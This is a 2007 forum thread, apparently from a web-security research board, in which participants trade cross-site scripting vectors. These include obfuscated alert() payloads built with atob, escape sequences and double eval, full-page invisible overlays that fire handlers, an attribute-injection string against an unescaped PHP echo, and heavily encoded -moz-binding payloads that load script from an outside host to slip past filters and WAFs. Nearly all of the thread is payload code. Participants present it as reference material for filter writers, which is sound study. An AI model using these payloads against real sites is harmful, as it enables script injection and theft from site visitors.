This one isn't really big news but nice for filter circumvention

<img src \/onerror = alert(2)

Filter evasion string creation:-
alert(uneval(/eval/).replace(/\//g, [ ] ));

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

try this in FF:-
alert(atob('amF2YXNjcmlwdDphbGVydCgxKQ'));

Looks like FF has inbuilt base64 encoding...:)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Yep - a to b and b to a are some good ol' Netscape relics.

http://developer.mozilla.org/en/docs/DOM:window.atob

Ah cool I didn't know, makes some things a lot easier in FF with those functions :)

Sorry if this was common knowledge

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Yep they thought about us lazy asses! ^^

typeof setTimeout('alert(this)',0)

or

typeof setTimeout('\x61\x6c\x65\x72\x74\x28\x31\x29',0)

Edited 1 time(s). Last edit at 11/06/2007 02:37AM by .mario.

Nice :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

And even more timeout and eval fun

new Function('\141\154\145\162\164\50\61\51')();

eval('(' + typeof setTimeout + '(){ alert(1) })()');

top/**/['\x61\x6c\x65\x72\x74']/**/(1)

No new technique - just beautiful :)

yeah vector poetry :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Here's some vector haiku:


the cycle it closes
the message is sent
at last

(ä=#1={}&&alert)(ä)

Edited 2 time(s). Last edit at 12/01/2007 04:01PM by .mario.

Todays vector haiku:


we eval
we eval it twice
to get around the corner


<style>
body:after{
content: "\61\6c\65\72\74\28\31\29"
}
</style>
<script>
eval(eval(document.styleSheets[0].cssRules[0].style.content))
</script>





Edited 1 time(s). Last edit at 12/01/2007 04:01PM by .mario.

Simply awesome Mario! How about that for a obscure payload :) cool!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

sorry to get offtopic.. im new here.. but the difficult part of XSS isn't also to inject the script tag?? i mean all these vectors are amazing, but whats the use case? (attaching them only to onLoad events, javascript:, etc??)



Edited 2 time(s). Last edit at 11/21/2007 07:58AM by divine.

@divine:

There's no practical use case. This thread is just to show new ways of executing JavaScript. maybe it might help in one or another case but the point is more like 'learn to know your browser - and be surprised on what input he(or she?) accepts'

The last haiku showed that CSS accepts 'shortened' Unicode entities in the content property close but not similar to the JS octal/hexadecimal entities - and something else: If you paste that code in a local HTML file and try to select the rendered text with the Firebug HTML Inspector you will notice that the stuff doesn't seem to exist (maybe a reason for the double eval). So this might turn out in some cases to be a circumvention vector for client side WAF applications.



Edited 2 time(s). Last edit at 11/21/2007 08:59AM by .mario.

@divine

Experimenting with ways of payload injecting can find new vectors and different ways of exploiting a system. Anyone writing a filter needs to know this information because simply blocking <> won't suffice.

Injecting a XSS string isn't the difficult part as far as I'm concerned, the difficult part is understanding how code can be injected in the various ways.

So I don't mind the question and I understand your point completely but lets agree to use this thread for new vectors only because I think it's a useful learning reference for people wanting to learn new ways to exploit XSS in Javascript, CSS and whatever else.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

<image src="" onerror="alert(/XSS/)" />
<image src="http://somedomain/somegraphic.jpg" onload="alert(/XSS/)" />
<p onmousemove="alert(/XSS/)">Long paragraph here</p>
<var onmousemove="alert(/XSS/)">Long paragraph here</var>
and so on...

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Here's a stealthy one :)

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="alert(/XSS/)" onclick="alert(/XSS/)"></div>

and a fun huge button :)
<button style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="alert(/XSS/)" onclick="alert(/XSS/)"></button>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

The input image can also be used for XSS as shown on rsnake's cheat sheet but it states it only works on certain browsers, you can get round this by using:-

<input type="image" src="x" onerror="alert(/XSS/)" />

Thinking about the one above it could be useful where a site doesn't specify the type attribute so e.g.

<input name="test" value="<?php echo $_GET['test']?>" />

?test=" type="image" src="x" onerror="alert(/XSS/)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/21/2007 10:39AM by Gareth Heyes.

MozBinding fun:-

<Q%^&*(£@!'" style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&
#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&
#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&
#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&
#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115
&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92
&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>

<div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&
#x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&
#x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&
#x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&
#x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C
&#x23&#x78&#x73&#x73&#x29>

<div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

Gareth, how do you use this?!



Edited 1 time(s). Last edit at 11/25/2007 01:38PM by klaus.

You need to make sure it's on one line first, then you require an external XML file like this:-
http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss

Note the #xss this is required to point to the relevant id in the xml file. Moz binding only works on Firefox. You could use it with tag injection like "><div/style etc or with a attribute like " style="etc

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Further mozbinding:-
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

And yeah this also works...

<x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)>

Why mozilla? Why? LOL

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

jaw drops...

Any real word example on a website vulnerable to those new vectors? How do you test?

@klaus

Please look into mozbinding to learn how to use the latest vectors:-
http://developer.mozilla.org/en/docs/CSS:-moz-binding

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I've made it easy to construct this kind of CSS attack using my tool Hackvertor:-
<div/style=<@backslashesc>-moz-binding<@/backslashesc>:<@backslashesc>url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)<@/backslashesc>>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Gareth Heyes Wrote:
-------------------------------------------------------
> Why mozilla? Why? LOL

http://www.w3.org/TR/CSS21/syndata.html#characters

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript